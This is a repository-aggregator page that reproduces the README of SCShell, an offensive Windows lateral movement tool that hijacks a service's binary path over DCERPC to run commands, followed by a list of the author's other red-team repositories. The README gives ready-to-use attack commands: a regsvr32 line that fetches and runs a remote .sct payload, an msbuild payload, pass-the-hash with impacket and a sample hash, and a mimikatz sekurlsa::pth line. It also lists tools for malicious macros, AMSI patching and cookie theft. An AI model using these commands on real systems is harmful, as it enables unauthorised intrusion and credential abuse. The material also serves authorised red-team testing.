Mr-Un1k0d3r/SCShell Mr-Un1k0d3r/SCShell

  • Stars
    star
    1,268
  • Rank 37,109 (Top 0.8 %)
  • Language
    C
  • Created about 5 years ago
  • Updated over 1 year ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
Mr-Un1k0d3r/SCShell
github

Mr-Un1k0d3r

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Fileless lateral movement tool that relies on ChangeServiceConfigA to run command

SCShell

SCShell is a fileless lateral movement tool that relies on ChangeServiceConfigA to run commands. The beauty of this tool is that it does not perform authentication against SMB. Everything is performed over DCERPC.

The utility can be used remotely WITHOUT registering a service or creating a service. It also doesn't have to drop any file on the remote system* (Depend on the technique used to execute)

How it work

Instead of creating a service it simply remotely open a service and modify the binary path name via the ChangeServiceConfigA API.

Then it starts the service.

Once the execution is completed the service binary path is reverted to the original one. The original service path is extracted using QueryServiceConfigA.

Everything is happening over DCERPC including the authentication.

network

Usage

The current build is written in C but I will port it to C# and PowerShell.

Usage:
SCShell.exe target service payload domain username password

target can be set to local to run the payload locally

Remote execution

SCShell.exe 192.168.197.131 XblAuthManager "C:\windows\system32\cmd.exe /c C:\windows\system32\regsvr32.exe /s /n /u /i://your.website/payload.sct scrobj.dll" . administrastor Password

I recommend using C:\windows\system32\cmd.exe /c to make sure to payload will not be killed once the service stop. You NEED to use the full path.

You can also use a msbuild payload

SCShell.exe 192.168.197.131 XblAuthManager "C:\windows\system32\cmd.exe /C C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\payload.csproj" . administrator Password
SCShell ***
Trying to connect to 192.168.197.131
Username was provided attempting to call LogonUserA
SC_HANDLE Manager 0x009ED250
Opening XblAuthManager
SC_HANDLE Service 0x009ED1B0
Service path was changed to C:\windows\system32\cmd.exe /C C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\payload.csproj
Service was started.

I'm using the XblAuthManager as the target which is the Xbox Accessory Management Service

Passing the Hash

scshell.py is a python2 & 3 implementation of SCShell. Using impacket project it can easily be used to perform the same lateral movement using pass the hash.

Installation

pip install impacket

Usage

python scshell.py DOMAIN/USER@target -hashes 00000000000000000000000000000000:ad9827fcd039eadde017568170abdecce
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Command need to use FULL path. No command output.
SCShell>

You can use the C utility to pass the hash. By default the current process token will be used. You can set the current process token using standard pass the hash approach.

On the local system

sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:cmd.exe

Then run the SCShell.exe within the newly created cmd.exe.

Compiling from source

The code was compiled on Windows using GCC Mingw compiler

Credit

Mr.Un1k0d3r RingZer0 Team

Tazz0 for the moral support

More Repositories

1

EDRs

C
1,857
star
2

PowerLessShell

Run PowerShell command without invoking powershell.exe
Python
1,413
star
3

DKMC

DKMC - Dont kill my cat - Malicious payload evasion tool
Python
1,323
star
4

RedTeamPowershellScripts

Various PowerShell scripts that may be useful during red team exercise
PowerShell
878
star
5

MaliciousMacroGenerator

Malicious Macro Generator
Visual Basic
811
star
6

ThunderShell

Python / C# Unmanaged PowerShell based RAT
Python
770
star
7

RedTeamCSharpScripts

C# Script used for Red Team
C#
706
star
8

RedTeamCCode

Red Team C code repo
C
464
star
9

CatMyPhish

Search for categorized domain
Python
418
star
10

PoisonHandler

lateral movement techniques that can be used during red team exercises
PowerShell
264
star
11

MaliciousClickOnceGenerator

Quick Malicious ClickOnceGenerator for Red Team
C#
234
star
12

ADHuntTool

official repo for the AdHuntTool (part of the old RedTeamCSharpScripts repo)
C#
229
star
13

Windows-SignedBinary

Python
224
star
14

.NetConfigLoader

.net config loader
223
star
15

Shellcoding

Shellcoding utilities
C
209
star
16

ATP-PowerShell-Scripts

Microsoft Signed PowerShell scripts
PowerShell
203
star
17

WindowsDllsExport

A list of all the DLLs export in C:\windows\system32\
C
199
star
18

AMSI-ETW-Patch

Patch AMSI and ETW
C#
196
star
19

DLLsForHackers

Dll that can be used for side loading and other attack vector.
Python
175
star
20

MaliciousDLLGenerator

DLL Generator for side loading attack
C
163
star
21

SCT-obfuscator

Cobalt Strike SCT payload obfuscator
Python
142
star
22

RedTeamScripts

Repo with various Red Team scripts
Python
137
star
23

Elevate-System-Trusted-BOF

C
132
star
24

Cookie-Graber-BOF

C or BOF file to extract WebKit master key to decrypt user cookie
C
129
star
25

SPFAbuse

SPF are not as strong as you may think. Red Team tool to send email on behalf of your target corp
Python
128
star
26

RemoteProcessInjection

C# remote process injection utility for Cobalt Strike
C#
80
star
27

Base64-Obfuscator

Simple PowerShell Base64 encoder to avoid detection of your malicious payload
PowerShell
74
star
28

SearchIPOwner

Search public IP owner through ARIN
Python
51
star
29

RedTeamFSharp

Red Team Toolset written in F# (Experimental)
F#
26
star
30

SideChannelAttack

Side Channel script
Python
24
star
31

BOFCode

Bunch of BOF files
C
13
star
32

blog.mr.un1k0d3r.com

Mr.Un1k0d3r.com blog
HTML
9
star
33

MsGraphFunzy

Scripts to interact with Microsoft Graph APIs
Python
5
star